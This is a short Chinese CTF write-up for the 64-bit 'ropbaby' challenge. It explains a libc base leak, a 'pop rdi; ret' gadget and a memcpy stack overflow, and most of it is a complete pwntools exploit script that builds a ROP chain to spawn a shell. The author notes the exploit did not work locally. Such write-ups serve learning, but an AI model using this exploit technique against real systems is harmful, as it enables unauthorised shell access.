实验吧的ropbaby
今天是一道ROP(64位)的我本地打不通nc连不上我服了
但这道题还是可以的我们
这个文件的main函数可以直接告诉我么system函数的地址然后我们就可以根据它给我们的libc文件得到偏移然后算出基地址,最后算出’/bin/sh’的地址然后ROP链起来用ROPgadget --binary libc-2.23.so --only ‘pop|ret’
得到pop rdi; ret
我们就可以链上了理论上就可以getshell
最后就是找溢出点这道题的溢出点是 memcpy(&savedregs, nptr, v6)
savedregs是长度为8字节但nptr有1024个字节所以溢出了…
这是我的exp
from pwn import *
p=process('./ropbaby')
libc=ELF('./libc-2.23.so')
bin_sh=0x18cd17
system_offset=0x45390
p.recvuntil('4) Exit')
p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
p.recvuntil('Symbol system: ')
system_addr=int(p.recv(18),16)
print system_addr
libcbase=system_addr-system_offset
bin_sh_addr=libcbase+bin_sh
gadget_addr=libcbase+0x021102
payload='a'*8+p64(gadget_addr)+p64(bin_sh_addr)+p64(system_addr)
p.recvuntil(': ')
p.sendline('3')
p.recvuntil('Enter bytes to send (max 1024): ')
p.sendline('64')
p.sendline(payload)
p.interactive()
逻辑上这个不会打不通阿无语了pwn太难啊带带我